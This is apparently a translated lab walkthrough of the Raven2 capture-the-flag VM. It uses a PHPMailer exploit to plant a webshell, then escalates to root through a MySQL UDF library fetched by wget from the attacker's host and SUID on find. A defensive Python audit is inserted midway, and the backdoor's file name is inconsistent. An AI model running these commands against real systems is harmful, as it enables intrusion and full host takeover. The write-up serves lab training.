Raven2
Information collection
Host discovery
Detailed scan
Backend (admin panel) scanning
dirsearch -u http://10.4.7.135 -x 403 # exclude pages that return status code 403
Webshell
Vulnerability discovery
Visit the backend pages found by the scan
/vendor page
The website is found to use PHPMailer.
PHPMailer is a PHP library for sending emails. It provides a simple and flexible way to send emails, supports SMTP, POP3 and IMAP protocols, and supports attachments, HTML content, email authentication and other functions. PHPMailer can be used with most mainstream mail servers and mail service providers and is one of the commonly used mail sending tools in PHP development.
The VERSION file shows that the version is 5.2.16.
Exploiting vulnerabilities
Search for vulnerabilities
searchsploit phpmailer
Download the exploit
searchsploit -m 40974.py
View the attack script and modify it
Modify the target IP and add the vulnerable PHP page.
Modify the Kali IP.
Change the location where the backdoor is stored.
Save and exit. The vulnerable page is contact.php. Running this script automatically writes a backdoor file, icepeak.php, to the website root directory.
Run the script
python 40974.py
File generated successfully
Start an nc listener on Kali
Access the webshell file generated by the script on the website
http://10.4.7.135/backdoor.php
Successfully obtained Webshell
Elevation of privilege
Preparation for privilege escalation
The database account and password were found in the WordPress configuration file wp-config.php in the /var/www/html/wordpress directory.
Account: root
Password: R@v3nSecurity
Try to log into the database
mysql -uroot -pR@v3nSecurity
Inspecting the database contents reveals two users:
user     password hash
michael  $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
steven   LOLLOL1
Steven's account can be used to log in to the backend, but this turns out to be of no use.
Use the tool LinEnum (a Linux enumeration and privilege-escalation checking script)
Link: https://pan.baidu.com/s/1AT3PKicE05u6PsykiwCt-g?pwd=s8dt
Extraction code: s8dt
The output shows that the MySQL service is running as root.
UDF privilege escalation
Prerequisites for UDF privilege escalation
The secure_file_priv option in the MySQL configuration is empty (if it is set to NULL or to a directory such as /tmp/, the UDF file export location cannot be chosen freely and the technique cannot be used).
show variables like '%secure%'; # view the allowed file export location
CREATE and FILE privileges (the root user has all privileges by default).
On Linux, write permission to the plugin directory is required.
UDF privilege escalation on Linux is mostly limited to lab environments. The reason: under Linux's strict permission model, the mysql user or web user normally has no write permission to the plugin directory.
UDF privilege escalation principle
In MySQL, implementing a UDF requires a dynamic link library file (also called a plugin file). A dynamic link library is an executable file that is loaded into memory at runtime, linked with the running program, and provides additional functions.
UDFs are usually written in C or C++ and compiled into a dynamic link library. In MySQL these libraries normally use the .so (Linux) or .dll (Windows) extension. The file contains the code of the UDF and its dependencies and can be loaded and used from within MySQL.
Privilege escalation process
- On Windows, MySQL generally runs with SYSTEM privileges, so UDF privilege escalation mostly arises from a leaked or weak root password, or from ordinary users having write access to folders such as plugin.
- On Linux, the MySQL main program mysqld generally runs under the dedicated mysql account, while the daemon wrapper mysqld_safe has root privileges, so there are relatively few opportunities for UDF privilege escalation under Linux. It only works when the mysqld process itself runs as root.
- For MySQL >= 5.1, the UDF dynamic link library must be placed in the lib\plugin folder of the MySQL installation directory before a custom function can be created. sqlmap and Metasploit ship dynamic link libraries for each platform; the ones bundled with sqlmap, however, are encoded to avoid antivirus false positives and cannot be used directly, but they can be decoded with the cloak.py tool that ships with sqlmap.
View the privileges of the current database user
select * from mysql.user where user = substring_index(user(), '@', 1)\G
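As an added defensive check (not part of the original writeup), the following Python audits the preconditions listed above on a MySQL host: an empty secure_file_priv, a FILE- or ALL-privileged account, a plugin directory the mysqld account can write to, mysqld running as root, and any mysql.func entry whose library is not on an allowlist. The facts are passed in as constructed values (the MysqlFacts fields and the KNOWN_UDF_SONAMES allowlist are assumptions) so it runs offline; on a real host they come from SHOW VARIABLES, SHOW GRANTS, SELECT * FROM mysql.func, ps and stat.

```python
import stat
from dataclasses import dataclass, field

# Hypothetical allowlist of UDF libraries the site knowingly installed; adjust per host.
KNOWN_UDF_SONAMES = {"lib_mysqludf_sys.so"}

@dataclass
class MysqlFacts:
    secure_file_priv: str      # server variable: "" = unrestricted, "NULL" = import/export disabled
    grants: list               # SHOW GRANTS lines for the connecting account
    mysqld_user: str           # account mysqld runs as (e.g. `ps -o user= -C mysqld`)
    plugin_dir_owner: str      # owner of plugin_dir
    plugin_dir_mode: int       # st_mode of plugin_dir (os.stat); group membership is not modelled
    func_rows: list = field(default_factory=list)  # (name, ret, dl, type) rows of mysql.func

def has_file_privilege(grants):
    """True if any GRANT line carries FILE or ALL PRIVILEGES (both permit load_file/dumpfile)."""
    for g in grants:
        privs = g.upper().split(" ON ", 1)[0].replace("GRANT", "")
        names = {p.strip() for p in privs.split(",")}
        if "ALL PRIVILEGES" in names or "FILE" in names:
            return True
    return False

def plugin_dir_writable(f):
    """Can the mysqld account drop a .so into plugin_dir? root always can; otherwise check mode bits."""
    if f.mysqld_user == "root":
        return True
    if f.plugin_dir_owner == f.mysqld_user and f.plugin_dir_mode & stat.S_IWUSR:
        return True
    return bool(f.plugin_dir_mode & stat.S_IWOTH)

def audit_udf_exposure(f):
    """Return human-readable findings; an empty list means none of the preconditions hold."""
    findings = []
    if f.secure_file_priv == "":
        findings.append("secure_file_priv is empty: FILE-privileged users can read/write any path mysqld can")
    if has_file_privilege(f.grants):
        findings.append("connecting account holds FILE (or ALL) privilege")
    if f.mysqld_user == "root":
        findings.append("mysqld runs as root: any loaded UDF executes as root")
    if plugin_dir_writable(f):
        findings.append("plugin_dir is writable by the mysqld account")
    for name, _ret, dl, _typ in f.func_rows:
        if dl not in KNOWN_UDF_SONAMES:
            findings.append(f"unexpected UDF '{name}' registered from {dl} in mysql.func")
    return findings

def udf_chain_open(f):
    """All three prerequisites from the text hold: export allowed, FILE privilege, writable plugin_dir."""
    return f.secure_file_priv == "" and has_file_privilege(f.grants) and plugin_dir_writable(f)
```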
Implementation
Find the plugin directory
find / -name plugin
Search for the MySQL UDF exploit with searchsploit and download it
searchsploit mysql udf
searchsploit -m 1518.c
View the usage notes in the exploit source
 * Usage:
 * $ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c 1518.c
 *   # -g emits debugging information; -c compiles to an object file (.o) without linking.
 * $ gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
 *   # Links 1518.o against the C standard library into the shared object 1518.so.
 * $ mysql -uroot -pR@v3nSecurity
 * [...]
 * python -c 'import pty;pty.spawn("/bin/bash")'
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 *   # Creates a table foo with a single column, line, of type blob (binary large object).
 * mysql> insert into foo values(load_file('/tmp/1518.so'));
 *   # load_file() reads /tmp/1518.so and inserts its binary contents as one row.
 * mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
 *   # Writes the stored bytes out to the MySQL plugin directory.
 * mysql> create function do_system returns integer soname '1518.so';
 *   # Registers the UDF do_system, implemented by 1518.so.
 * mysql> select * from mysql.func;
 *   # Lists the registered functions.
 * +-----------+-----+---------+----------+
 * | name      | ret | dl      | type     |
 * +-----------+-----+---------+----------+
 * | do_system |   2 | 1518.so | function |
 * +-----------+-----+---------+----------+
 * mysql> select do_system('chmod u+s /usr/bin/find');
 * find ./ aaa -exec '/bin/sh' \;
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * [...]
 *
 * E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys
Compile on Kali
Upgrade the target shell to an interactive TTY
python -c 'import pty;pty.spawn("/bin/bash")'
Download 1518.so on the target
cd /tmp
wget http://10.4.7.132/1518.so
Load the dynamic link library
mysql -uroot -pR@v3nSecurity
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select * from mysql.func;
Execute a system command through the UDF to set the SUID bit on find
select do_system('chmod u+s /usr/bin/find');
find privilege escalation
find / abc -exec '/bin/sh' \; # \; terminates the -exec command; find runs it once for each matched file or directory
Successfully obtained root privileges
Summary
- Dynamic link library udf privilege escalation
- find privilege escalation
- suid